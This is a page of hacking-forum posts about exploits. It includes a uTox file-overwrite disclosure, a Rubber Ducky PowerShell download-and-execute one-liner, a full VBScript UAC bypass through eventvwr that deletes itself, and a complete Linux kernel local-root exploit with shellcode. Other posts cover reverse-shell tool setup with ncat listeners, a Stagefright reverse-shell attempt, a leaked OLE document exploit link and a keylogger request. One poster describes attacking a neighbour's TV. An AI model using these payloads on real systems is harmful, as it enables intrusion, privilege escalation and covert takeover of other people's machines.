Search the Community

uTox through 0.18.1 doesn't validate incoming file name, allowing remote attacker to overwrite arbitrary file on victim's machine. Remote attacker may overwrite ~/.bashrc or ~/.profile as well, causing remote code execution. To exploit this vulnerability, modified uTox client may be used. Just set name and name_length variables in file_transfers.c, in ft_send_file(), before tox_file_send(), and send an evil shell script. For example: name = "/home/krobelus/.bashrc"; name_length = strlen(name); Second vulnerability exists only if uTox is in portable mode, with --portable parameter. https://github.com/uTox/uTox/blob/develop/src/xlib/filesys.c void native_autoselect_dir_ft(uint32_t fid, FILE_TRANSFER *file) ... uint8_t *path = malloc(file->name_length + 1); ... if (settings.portable_mode) { snprintf((char *)path, UTOX_FILE_NAME_LENGTH, "./tox/Tox_Auto_Accept/"); native_create_dir(path); snprintf((char *)path, UTOX_FILE_NAME_LENGTH, "./tox/Tox_Auto_Accept/%.*s", (int)file->name_length, file->name); Here file->name_length is less than UTOX_FILE_NAME_LENGTH, so any incoming file transfer will cause remote heap overflow, denial of service and, possibly, remote code execution. Automatic file acceptance must be turned on to exploit these two vulnerabilities, but due to uTox peculiarities, this option is on among the majority of users already. These peculiarities are that uTox users have only a few seconds to confirm file receiving, thus receiving a few files one by one quickly turns into hell. Debug builds are not vulnerable to heap overflow, because AddressSanitizer is used. Vulnerabilities reported to cve.org, but no entries were created hitherto.

Hi guys, I am new to this forum and after looking around nearly everywhere, I am unable to find an answer to this question and hoped you could help. After scanning a website with nkito, the result showed that it was vulnerable to the sips vulnerability and that I could login as admin without knowing the password. However, after inputting the information in the url, I was simply redirected to the login page which also contains a captcha. Is there anyway I can still exploit the vulnerability such as using Metasploit?? Please help

Hello! This is my first post and contribute to this community, one of hopefully many. I am yet to receive my rubber ducky, so while waiting i thought i give writing some scripts a go. I consider the rubber ducky to be the mother of physical access exploits, being able to deploy anything in a very short period of time. DELAY 750 GUI r DELAY 1000 STRING powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://myhost.com/script.txt', '%temp%/run.vbs') ;Start-Process '%temp%/run.vbs'}" DELAY 500 ENTER Above is a basic rubber ducky script that downloads and executes a .vbs script in one line using the "run" prompt in windows. Nothing fancy, fast and easy download and execute, however we are taking this a bit further. (This is the part i cannot yet test myself due to me not having the Rubber ducky at hand, however based on examples, this should be OK, please confirm if you have time) To get maximum speed we are using a 2 step process, getting a low sized script file is much faster then going to the payload itself straight away. This is the script.txt (run.vbs when saved) Sub Main() 'Setting some vars fileurl = "https://the.earth.li/~sgtatham/putty/latest/x86/putty.exe" filename = WScript.CreateObject("Scripting.FileSystemObject").GetSpecialFolder(2) & "/pt.exe" 'Download function dim shellobj set shellobj = wscript.createobject("wscript.shell") strlink = fileurl strsaveto = filename set objhttpdownload = createobject("msxml2.xmlhttp" ) objhttpdownload.open "get", strlink, false objhttpdownload.send set objfsodownload = createobject ("scripting.filesystemobject") if objfsodownload.fileexists (strsaveto) then objfsodownload.deletefile (strsaveto) end if if objhttpdownload.status = 200 then dim objstreamdownload set objstreamdownload = createobject("adodb.stream") with objstreamdownload .type = 1 .open .write objhttpdownload.responsebody .savetofile strsaveto .close end with set objstreamdownload = nothing end if 'UAC bypass/exploit setup Set WshShell = CreateObject("WScript.Shell") myKey = "HKCU\Software\Classes\mscfile\shell\open\command\" WshShell.RegWrite myKey,filename ,"REG_SZ" 'UAC bypass/exploit trigger CreateObject("WScript.Shell").Run "eventvwr.exe" WScript.Sleep 1000 'UAC bypass/exploit cleanup Set objShell = Wscript.CreateObject("Wscript.Shell") objShell.RegDelete "HKCU\Software\Classes\mscfile\shell\open\command\" 'Cleanup removal of this script after completed Set Cleanup = WScript.CreateObject("WScript.Shell") Cleanup.Run "cmd /c del %temp%\run.vbs", 0, True End Sub 'We dont want to display any errors On Error Resume Next Main If Err.Number Then 'on error cleanup and exit set Cleanup = WScript.CreateObject("WScript.Shell") Cleanup.Run "cmd /c del %temp%\run.vbs", 0, True WScript.Quit 4711 End If I have commented this to my best ability. its pretty straight forward and is about 2kb in size It download and executes (in this case putty) as pt.exe in the temp folder of the current windows user. It then proceeds to write the payload file-path as a string value to "HKCU\Software\Classes\mscfile\shell\open\command\", we then trigger "eventvwr.exe" which is a built in windows application, this will launch our payload (pt.exe) as ADMIN on the targeted machine without any form of UAC prompt prompting the user. We then remove the reg-key to avoid issues in the future followed by the vbs script removing itself from the computer leaving little trace. If any point we get an error we also remove the script. . This method of bypassing UAC giving admin rights to any application using the path written as a string in the reg-key works on all versions of windows(From where the UAC system was introduced ofc) as far up as Windows 10 Pro 64Bit Build 1607. Basically 90% of machines. I hope you all enjoyed this, i will be making a short demo video of this to see the deployment speed when i receive my copy of the rubber ducky. Best Regards ~skiddie

The website cloner is not working for external viewers to my IP, it works from the host computer but no other one, I am quite new to this and would like a detailed responce on how I make it work for external clients visiting the IP. ~Thankyou

I'm looking for a good list of easy to explore CVE's to begin learning about exploit creation.

“Hackers are using booby-trapped Word documents to deliver malware to unsuspecting victims. The malware exploits Windows Object Linking and Embedding (OLE) features, which allow users to link to documents and other objects – in this case, a malicious remote server.”Source: https://www.vadesecure.com/en/word-doc-malware/This tool was created by the AutoLog team and has been since leaked. Here is the latest version of their OLE Doc Exploit.VirusTotal: https://www.virustotal.com/#/file/1b59c575fc8f3357982a4d917300725065946e31e3dd39f8b00c084aae8f3314/detection Download: https://www.0dayexploits.net/product/ole-doc-exploit/

asmTshell is a exploit pen test application I developed for users using linux such as debian ubuntu or kali OS. This tool allows you to build a reverse shell binary file and can be set to run on any OS be it windows linux or mac. Once the target windows/linux/mac system runs the shell binary they connect to your server giving you full control of the systems command prompt or shell from your server. It works by utilizing a linux asm compiler called "nasm" It takes target asm payload and allows you to customize the payload to your desired IP and port # through a easy GUI. Once configuration is done from GUI it will edit your input to the needed ASM hex strings using a custom python script. After which it will compile your new ASM into your target binary file. To get a server running you can use netcat nc or ncat ncat -lvkp 1344 ncat to accept more than one client connection to server nc -lvp 1344 netcat -lvp 1344 Once target system runs the shell binary they will connect to your server allowing you to control there OS from the shell. **Limitations** "keep in mind that your port or ip should not contain a 0, which could break it. If your IP contains a zero like 192.168.0.1 or your port contains a zero like 80, the build will not work" --Read-- can test using 127.1.1.1 as localhost server IP Download - https://www.dropbox.com/s/0cwhldcqjwvrgo3/asmshell.tar?dl=0 AV scan - https://www.virustotal.com/#/file/253d12fb5ddd6c58e02b5bbe0822012aef3624dae01a95927f148ba1da15a4c5/detection

Hi there, Can I use teensy 2++ to use BadUSB exploit like a rubber ducky ?

Hope someone can help me....... I used CVE-2017-0785 to exploit my neighbours SmartTV...... It gave me this out ---> sudo python CVE-2017-0785.py TARGET=CC:B1:1A:F6:D7:76 [!] Pwntools does not support 32-bit Python. Use a 64-bit release. [+] Exploit: Done 00000000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 │····│····│····│····│ * 00000020 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 01 │····│····│····│····│ 00000030 b5 69 01 00 b4 8f e9 c0 00 00 00 00 b5 54 fe a3 │·i··│····│····│·T··│ 00000040 00 00 00 06 b5 69 39 70 b4 8f e9 e0 b5 60 61 38 │····│·i9p│····│·`a8│ 00000050 b5 60 61 38 b5 69 39 70 b5 69 39 64 b5 69 5a a4 │·`a8│·i9p│·i9d│·iZ·│ 00000060 b4 8f e9 f8 00 00 00 00 b5 69 5a a4 00 00 00 41 │····│····│·iZ·│···A│ 00000070 b4 8f eb 84 b5 54 e6 f9 b5 60 61 38 b5 69 41 78 │····│·T··│·`a8│·iAx│ 00000080 b4 8f ea 08 b5 56 e0 4f b4 8f ea 10 b5 54 57 fd │····│·V·O│····│·TW·│ 00000090 00 00 00 00 b5 69 41 60 b5 56 79 59 b5 69 39 64 │····│·iA`│·VyY│·i9d│ 000000a0 b4 8f ea 30 00 00 00 18 b4 8f ea d0 b5 54 ca c3 │···0│····│····│·T··│ 000000b0 b5 69 41 60 00 00 00 05 b5 60 61 38 b4 8f ea 58 │·iA`│····│·`a8│···X│ 000000c0 00 00 00 18 b4 8f ea d0 b5 69 39 64 b5 54 d2 bf │····│····│·i9d│·T··│ 000000d0 00 00 00 00 b4 30 04 90 00 00 00 00 42 27 e0 00 │····│·0··│····│B'··│ 000000e0 00 00 00 00 b5 69 39 64 00 00 00 08 00 00 00 01 │····│·i9d│····│····│ 000000f0 b4 30 04 90 b4 8f ea d0 00 00 00 41 b5 69 39 64 │·0··│····│···A│·i9d│ 00000100 b4 8f ea a8 b5 69 41 60 00 00 00 03 b5 69 39 64 │····│·iA`│····│·i9d│ 00000110 b5 60 61 38 b4 30 c8 d8 b4 8f ea a0 b5 56 e0 4f │·`a8│·0··│····│·V·O│ 00000120 b4 8f ea a8 b5 56 f6 21 b4 30 c8 d8 41 02 6f 10 │····│·V·!│·0··│A·o·│ 00000130 b4 8f ea b8 b5 50 a1 b7 21 00 00 14 0e 0a 24 00 │····│·P··│!···│··$·│ 00000140 b5 60 61 38 b5 69 ab 60 b4 8f ea d0 b5 56 e0 4f │·`a8│·i·`│····│·V·O│ 00000150 b4 8f ea d8 b5 69 ab 58 b3 6d d4 87 00 00 00 00 │····│·i·X│·m··│····│ 00000160 b4 8f ea f8 00 00 00 02 00 00 00 10 b3 6d f4 b0 │····│····│····│·m··│ 00000170 b5 60 61 38 b5 56 d2 45 b4 8f eb 10 00 00 00 00 │·`a8│·V·E│····│····│ 00000180 b5 69 5a a4 00 00 00 41 00 00 00 13 b5 54 e6 f9 │·iZ·│···A│····│·T··│ 00000190 b4 8f ed 24 b5 69 41 60 b5 60 61 38 b4 8f eb 30 │···$│·iA`│·`a8│···0│ 000001a0 00 00 00 19 b4 8f ed 24 00 00 00 41 b5 54 9f 4b │····│···$│···A│·T·K│ 000001b0 00 00 00 00 b5 69 41 60 b5 60 61 38 00 00 00 64 │····│·iA`│·`a8│···d│ 000001c0 b4 8f eb 48 b5 56 e0 4f b4 8f eb 50 b5 56 ef 31 │···H│·V·O│···P│·V·1│ 000001d0 b5 60 61 38 b5 69 ab 60 b5 60 61 38 b5 69 ab 60 │·`a8│·i·`│·`a8│·i·`│ 000001e0 b4 8f eb 68 b5 56 e0 4f b4 8f eb 70 b5 54 57 fd │···h│·V·O│···p│·TW·│ 000001f0 b5 69 ab 58 b4 8f ed 24 00 00 00 41 b5 69 ab 10 │·i·X│···$│···A│·i··│ 00000200 b4 8f eb 90 00 00 00 0f b4 8f ed 24 b5 56 82 8b │····│····│···$│·V··│ 00000210 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 │····│····│····│····│ 00000220 b5 60 61 38 b5 60 61 38 b3 6e 95 b8 00 00 00 41 │·`a8│·`a8│·n··│···A│ 00000230 b4 8f eb c8 00 00 00 41 b3 6e 95 b8 b5 60 61 38 │····│···A│·n··│·`a8│ 00000240 b3 6e b5 f0 b5 56 79 25 b5 56 78 bd b5 69 41 60 │·n··│·Vy%│·Vx·│·iA`│ 00000250 b5 69 39 64 00 00 00 14 b4 8f eb e0 b5 54 cd db │·i9d│····│····│·T··│ 00000260 b5 56 79 59 b5 69 39 64 b4 8f eb f0 b5 54 c9 f5 │·VyY│·i9d│····│·T··│ 00000270 b5 69 41 60 b5 69 41 60 00 00 00 06 b5 60 61 38 │·iA`│·iA`│····│·`a8│ 00000280 b4 8f ec 18 00 00 00 14 b3 6e f6 60 b5 54 d2 13 │····│····│·n·`│·T··│ 00000290 b5 54 da cd b5 69 41 60 00 00 00 00 b5 69 39 64 │·T··│·iA`│····│·i9d│ 000002a0 b4 8f ec 38 00 00 00 00 00 00 00 00 b5 60 00 00 │···8│····│····│·`··│ 000002b0 b5 60 61 38 b3 6f 16 a0 00 00 00 41 00 00 00 0f │·`a8│·o··│···A│····│ 000002c0 b4 8f ec 68 00 00 00 0f b3 6f 16 a8 b5 60 61 38 │···h│····│·o··│·`a8│ 000002d0 b3 6f 36 d0 b5 54 6e 5d 00 00 00 00 ff ff ff ff │·o6·│·Tn]│····│····│ 000002e0 00 00 00 00 b5 68 13 71 00 00 00 0c b5 69 39 70 │····│·h·q│····│·i9p│ 000002f0 00 00 00 0e b5 5d 62 84 b5 5d 62 c0 b5 5d 62 e0 │····│·]b·│·]b·│·]b·│ 00000300 b5 5d 63 10 b5 5d 63 3c b5 5d 63 68 00 00 00 41 │·]c·│·]c<│·]ch│···A│ 00000310 b3 6c 82 1c 00 00 00 01 00 00 00 00 b3 6c 82 36 │·l··│····│····│·l·6│ 00000320 b4 8f ed 24 00 00 00 41 b3 6c 82 36 00 00 00 00 │···$│···A│·l·6│····│ 00000330 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 │····│····│····│····│ 00000340 00 00 00 00 b5 60 61 38 b5 60 61 38 b5 69 39 70 │····│·`a8│·`a8│·i9p│ 00000350 b5 69 39 64 b5 69 5a a4 b4 8f ec f0 00 00 00 00 │·i9d│·iZ·│····│····│ 00000360 b5 69 5a a4 b4 31 15 07 b5 69 39 70 b5 54 e6 f9 │·iZ·│·1··│·i9p│·T··│ 00000370 b5 69 39 64 00 00 00 02 b5 69 5a a4 b4 8f ed 20 │·i9d│····│·iZ·│··· │ 00000380 b4 31 15 07 00 00 00 0c b4 31 15 07 b5 54 ea 59 │·1··│····│·1··│·T·Y│ 00000390 00 00 00 00 00 00 00 00 00 00 00 00 41 02 6f 10 │····│····│····│A·o·│ 000003a0 b5 5d 88 94 b5 5d 88 5c b4 8f f8 f0 b5 69 f7 20 │·]··│·]·\│····│·i· │ 000003b0 00 00 02 e9 42 2b d0 10 00 00 01 74 00 00 00 00 │····│B+··│···t│····│ 000003c0 b4 8f ed 58 00 00 00 00 b4 8f ed 50 00 00 00 81 │···X│····│···P│····│ 000003d0 42 2b cc 60 b4 8f ed 60 00 00 00 00 00 00 00 00 │B+·`│···`│····│····│ 000003e0 00 00 00 00 b5 69 f7 20 b5 69 f6 d4 00 00 00 00 │····│·i· │·i··│····│ 000003f0 b4 8f ed 78 b5 69 f6 b0 00 00 00 00 00 00 ff ff │···x│·i··│····│····│ 00000400 b4 8f ed 98 b4 8f ed 90 b4 8f f8 f0 0e 0a 24 00 │····│····│····│··$·│ 00000410 b4 8f ed 98 │····││ 00000414 Who knows what to do now with this Code?

Hey all ! Greetings.! This is my 1st thread I have just a quick question regarding CTFs or Linux Systems. Anyone up for clarifying my doubt? So almost any CTF machine without GRUB or Kernel restriction can be easily tweaked to gain root access.! If so, i think this can be a legit way to enter the system and perform rest of the activities.It saves time and doesn't require privilege escalation exploits. If not, please do tell me why this can't be a legit way?

I have found an exploit that turns off a phone. I am wondering how i can develop this into something?

Hi all i'm currently undertaking a project that involves exploiting a metapsloitable 2 machine and a windows XP machine running SP3, however the findings that i have found are that there are limited resources available when using metapsloit as there seems to be many step by step guides of how to complete an exploit but not enough information regarding troubleshooting. Do you think it would be beneficial to learning to explain more about each step of an exploit in terms of what each command does and if an exploit fails for there to be more information available about why it fails and workarounds for how to solve such problems. For instance when trying to exploit Windows XP with the popular ms08_067_netapi exploit the results for my conducted test just returned "Exploit Completed, but no session was created" Any feedback regarding this would be most welcome. Thanks.

Hi all, I'm trying to learn the basics of using public exploit code and am running into a "floating point exception" error when I run the complied code on the target machine. I'm not sure if I am doing something wrong, or if I just need to move on and try another exploit. Your help is greatly appreciated. I am using a 64 bit Kali VM to attack a 32 bit redhat SHRIKE VM. I found an exploit in exploitdb that looks like it should work, "12.c", and have compiled it. The original source code had some simple errors with bad comments and a header file that was in a different location. So I fixed those and compiled with the -m32 switch to create a 32bit compatible executable. I currently get no errors or warnings. When I run it on my Kali VM, the exploit fails, but appears to run properly. However, I transferred the file to the target machine, made the file executable, and ran it, and got an error that said "Floating Point Exception". I read a few things about FPEs and they say the code is probably trying to divide by 0. Which doesn't really help me. Can any of you help? Thanks in advance /*********************************************** * * Linux Kernel Module Loader Local R00t Exploit * Up to 2.4.20 * By anonymous KuRaK * ************************************************/ #include <stdio.h> #include <stdlib.h> #include <signal.h> #include <fcntl.h> #include <errno.h> #include <unistd.h> #include <sys/types.h> #include <sys/stat.h> #include <sys/ptrace.h> #include <sys/wait.h> #include <sys/mman.h> #include <sys/time.h> #include <sys/user.h> #define TMPSIZE 4096 #define FMAX 768 #define UIDNUM 6 #define MMSIZE (4096*1) #define MAXSTACK 0xc0000000 // where to put the root script #define SHELL "/tmp/w00w00w" // what to open to run modprobe #define ENTRY "/dev/dsp3" struct uids { unsigned uid; unsigned euid; unsigned suid; unsigned fsuid; }; // thanks to the epcs2.c code :-)) char shellcode[] = "\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x31\xc0\x31\ xdb\xb0\x17\xcd\x80" /* setuid(0) */ "\x31\xc0\xb0\x2e\xcd\x80" "\x31\xc0\x50\xeb\x17\x8b\x1c\x24" /* execve(SHELL) */ "\x90\x90\x90\x89\xe1\x8d\x54\x24" /* lets be tricky */ "\x04\xb0\x0b\xcd\x80\x31\xc0\x89" "\xc3\x40\xcd\x80\xe8\xe4\xff\xff" "\xff" SHELL "\x00\x00\x00\x00"; // payload... char *shellcmd = "#!/bin/sh\nid|wall\necho \"Your kernel is buggy\"|wall"; volatile int sig = 0; volatile struct user_regs_struct regs; void sighnd(int v) { sig++; } void fatal(const char *msg) { printf("\n"); if (!errno) { fprintf(stderr, "FATAL ERROR: %s\n", msg); } else { perror(msg); } printf("\n"); fflush(stdout); fflush(stderr); exit(129); } void exploit(int pid) { int i; if (ptrace(PTRACE_GETREGS, pid, 0, &regs)) fatal("ptrace: PTRACE_GETREGS"); for (i = 0; i <= sizeof(shellcode); i += 4) { if (ptrace (PTRACE_POKETEXT, pid, regs.eip + i, *(int *) (shellcode + i))) fatal("ptrace: PTRACE_POKETEXT"); } if (ptrace(PTRACE_SETREGS, pid, 0, &regs)) fatal("ptrace: PTRACE_SETREGS"); ptrace(PTRACE_DETACH, pid, 0, 0); kill(pid, SIGCONT); } int get_ids(FILE * fp, struct uids *uids) { int i; char tmp[TMPSIZE]; fseek(fp, 0, SEEK_SET); for (i = 0; i < UIDNUM; i++) fgets(tmp, sizeof(tmp), fp); return fscanf(fp, "Uid: %u %u %u %u", &uids->uid, &uids->euid, &uids->suid, &uids->fsuid); } int main(int ac, char **av) { int fd, pid, p, i; char buf[TMPSIZE]; struct uids uids; FILE *fp; setpgrp(); setsid(); umask(022); unlink(SHELL); fd = open(SHELL, O_RDWR | O_CREAT | O_TRUNC, 0755); fp = fdopen(fd, "w+"); fprintf(fp, "%s\n", shellcmd); fclose(fp); pid = getpid() + 2; snprintf(buf, sizeof(buf) - 1, "/proc/%d/status", pid); printf("\nModprobe pid %d, my pid %d", pid, getpid()); fflush(stdout); signal(SIGUSR1, sighnd); // fork modprobe helper if (!(p = fork())) { // some nice work for exec_usermodehelper(), keep it busy! for (i = 0; i < FMAX; i++) { fd = open("/dev/zero", O_RDWR); mmap(NULL, MMSIZE, PROT_READ | PROT_WRITE, MAP_PRIVATE, fd, 0); } kill(getppid(), SIGUSR1); while (!sig); printf("\nHelper (pid %d) requesting module...", getpid()); fflush(stdout); fd = open(ENTRY, O_RDONLY | O_NONBLOCK); exit(0); } // synchronize with the child else { while (!sig); kill(p, SIGUSR1); // wait for modprobe to run at unprivileged level while (1) { fd = open(buf, O_RDONLY); if (fd > 0) { if (!(fp = fdopen(fd, "r"))) fatal("fdopen"); if (get_ids(fp, &uids) != 4 || (uids.uid != uids.euid || uids.uid != uids.suid || uids.uid != uids.fsuid)) { fatal("did not catch modprobe...try again later :-)"); } // ok, it runs... while (1) { if (ptrace(PTRACE_ATTACH, pid, NULL, NULL)) { fatal("PTRACE_ATTACH failed!"); } else { i = 0; printf("\nAttached afterburner...\n"); fflush(stdout); while (ptrace(PTRACE_GETREGS, pid, 0, &regs) || !regs.eip || regs.eip >= MAXSTACK) { ptrace(PTRACE_SYSCALL, pid, NULL, NULL); printf("\rplease wait %d", i++); fflush(stdout); } waitpid(pid, NULL, WUNTRACED); printf ("\nValid EIP found EIP=%p\nexploiting the bug, good luck... ", regs.eip); fflush(stdout); exploit(pid); exit(0); } } fclose(fp); } } } return 0; } // milw0rm.com [2003-04-14]

This is my official release of my UAC bypassing Rubber Ducky payload generator "UAC-DUCK". Download and execute any binary executable on any windows machine with UAC enabled as administrator WITHOUT prompting the user to elevate privileges . Its a 3 second download and execute with admin access. Generator written in Python so it's cross compatible with Windows and Linux. Github: https://github.com/SkiddieTech/UAC-D-E-Rubber-Ducky Full demo: http://sendvid.com/uh6i317i It uses a simple 2 stage process Stage 1: Stage one is the script that is triggered when the ducky is connected to any targeted windows machine. It will execute an powerful one-liner inside the "run" dialog of the system. The one liner is a simple powershell script, that when executes instantly hides then powershell windows and runs it the background. The powershell script downloads and execute our stage 2 .vbs payload in the %temp% directory Stage 2: Once your .vbs payload is on the system, we proceed to download our main binary payload. The .vbs script exploits a flaw in the windows registry system, this allows us to execute any binary file on the system with admin privilege without prompting the user for access (UAC). My Twitter: https://twitter.com/SkiddieTech

I've been seeking online for a complete tutorial that goes from finding if a computer is vulnerable to an exploit to getting a meterpreter session without the use of trojans. The things that are missing are... 1.the exact procedure of scanning a pc to find if it is vulnerable (and if it is possible a pc outside a local network and how is it possible to scan individual compuiters that are behind routers?) 2. Importing a new exploit that isnt already inside the metasploit framework. 3. setting a backdoor without the use of the persistance command of the meterpreter. 4. the procedure of the triggering of the exploit on the victim machine (what happens exactly?) any kind of info is apreciated.

Hi guys, after the discovery of the Stagefright bug, the researcher of Zimperium have post a python script for the specific module CVE 1538. I've download it and i've try to execute this on my Android phone with Lollipop 5.0. Before this, i've downloaded the apk of zimperium to test if my phone is vulnerable. The app show me, in green, the module CVE-1538 e other... After this, on my linux pc with python 2.7.x, i've renamed the script in mp4.py for resolve an error of import. After this i've tried to generate the file.mp4 with this command: $python2 mp4.py -c [LAN IP] -p 4444 The script correctly generate an file.mp4 without an error. After i've launch a listener with: $netcat -l -p 4444 I've sended the file.mp4 to my smartphone and i've tried to exec this. The terminal with netcat don't show anything, no result, nisba, nada... I've tried with metasploit listener with multi/hanlder but with a same result. Any solution? Thanks everyone and sorry for my english ;-P

hello everyone, i was wonder about support regard security issues/exploits. so like most of you guys i also carry a "smartphone" (android in this case). what do you guys think the support on a "smartphone" should be? 2 years, 3 year, 5 years? and should it receive security updates even a year after the mentioned years? also i own a HTC One M7 (android) should in this case HTC (and or any other brand) make a security update for a phone regarding the fact that it is 3 years old because of the stagefright exploit? Thank in advance and sorry if the reading is wonky

Is there any way for me to inject a payload into the duck that records keystrokes automatically, or at least run a software that i made, a keylogger, automatically upon insertion? If there is can you give the codes? Thank you.

Hi Guys, I figured I'd give this site try, you guys seem very knowledgeable. I'm on two straights weeks of researching exploits for my Red hat 2.4.20-8 version and hoping the end result being escalated local privileges from a standard user. Everything keeps pointing back to the following code for that older OS. https://www.exploit-db.com/exploits/22362/ And the Mremap.c code, Ive seen remap.c and also mremap .c Unfortunately im not a programmer, yet I've learned about the gcc compiler , versions of gcc and so on in the recent weeks through my trials. My studies end here, it boils down to running this exploit without errors and gaining root access. Here's my question, where should I look to resolve this errors? Any direction is helpful. Ive attached a sample of the output Im receiving when running the remap code. I'm lost... appreciate it in advance.

Howdy Hak5 folks.. Well, I'm expected some "try harders" and other such encouragement :)..I'm at the very tail end of the CPT exam. If anyone is unsure of it, first part is multi-choice (aced it!) ..second is compromising two VM's..got first in minutes happy to say..the second one......here is where I'm losing my hair very quickly. The objective is root password on both vm;s...this second one is where I seem to be hitting a dead end, and this is the first reaching out for help attempt. Basically, from what I can gather, this particular vm needs to be compromised via a local exploit be it privy escalation, shellcode yadda yadda..I have tried (I think) most methods that I can figure out (at my level at least) and just getting killed with each attempt. Not looking for someone to spell it out for me, after all I've been at this VM for 2 weeks now before asking for some guidance. So I'm happy to start a dialogue with anyone interested to help. I'll spill some of the VM details here and if someone is kind enough to brainstorm with me, it would be much appreciated. Cheers VM Info: Red Hat Linux 9 (Shrike) Kernel 2.4.20-8 i686 athlon i386 (bear in mind this is on a VMWare Workstation, host is AMD chip fyi) gcc 3.2.2 2 non-root accounts have been acquired, no sudo privileges, long story short, these accounts can't do squat The accounts allow direct (local) access on the vm, or via ssh etc. from attack VM Tried out about 12 known exploits (mainly exploit-db et.al) for OS version and kernel The discovered services have some minor-medium level vulnerabilities, but none from what I can tell help to getting to root/shadow file. FYI, for the exploits tried, (I'm a sooper noob with shellcode, but learning fast and taking ANOTHER course fml) some backfired entirely, some compiled but failed to run, some compiled ran but seg-faulted etc etc, so they may work and I'm just inexperienced at compiling or altering them appropriately I've done some local enumeration of possible config, suid etc etc flaws but cant really determine an approach Think that about does it for a 'where I'm at'...like I said, I actually dont really want the "Here's how.." but some discussion or tips would really be appreciated. Just kinda fried and probably overthinking but having trouble getting focused and feel kinda burnt as far as ideas go.

I created a tutorial on how to get a remote shell on any windows PC in 5 seconds using RubberDucky... enjoy! https://crowdshield.com/blog/2015/pwn-any-windows-pc-in-5-seconds-with-badusb.php

As a pentester, I find myself checking random fields and forms for arbitrary code execution and came across a code execution flaw in the log viewer infusion for the Pineapple. This isn't technically a vulnerability since you need to be logged in as root but it's still un-intended functionality resulting in arbitrary code execution.... Regardless of the impact, I enjoy finding things like this so here it is... enjoy! https://www.youtube.com/watch?v=I_i2RhfB-Z8

Hi all, I was reading through xkcd and came across this comic. It seemed like a good idea, and I was wondering if something like that might be possible, and if so, how. I would need specifics, like how to set up connections. Thanks!

Hello, here is the video: How to exploit Heartbleed Vulnerability on Kali Linux arabic version of the video: شرح فحص و استغلال ثغرة heartbleed علي مواقع كبيرة و مشهورة share and enjoy :)

Dear Hak5ers, Apologies if this has been discussed, I only went a few pages in to see. So what I'm goofing with is the whole isolation proxy thing, using whonix-gateway in a VM (couldn't build successfully on my extra physical box). I followed the basic guide provided by them just to get er up and running. I'm a vmware man myself, but some extra work involved so went with the suggest virtualbox. So the guide suggest the following (actually a mix of two) vm #1 - the Whonix gateway. It has 2 NIC's : one is NAT so we can reach out on the net to TOR, second is an internal (called whonix) running on 192.168.0.10 by default vm#2 - kali (not whonix-workstation) with one NIC (the internal one called whonix) running on 192.168.0.20 So what's my beef? Well, a lot works in terms of tunneling everything through the whonix gateway, which is essentially the goold ole' "how to route everything through tor" debate. But the one item I'm trying to tinker with is getting metasploit to behave. Which it doesn't by default. What happens is (bear in mind this is through Armitage) regardless of the IP(s) you enter for testing, they all A) basically say every bloody port is open, and B) just to get things moving, I used a known vulnerable VM to see how exploits got handled in all this routing. Well, not to smooth. Basically they EOF over and over, so you'll see the box pop (turn red and lightning) then just die (End of File). Before I start pulling hair and messing with routing tables, and most importantly, mucking the whonix gateway which I shouldn't really touch to mouch, wanted to run this scenario buy you guys. See if anyone has tried this out, worked/not worked etc etc. Would love to work this one out with some discussion. Thoughts?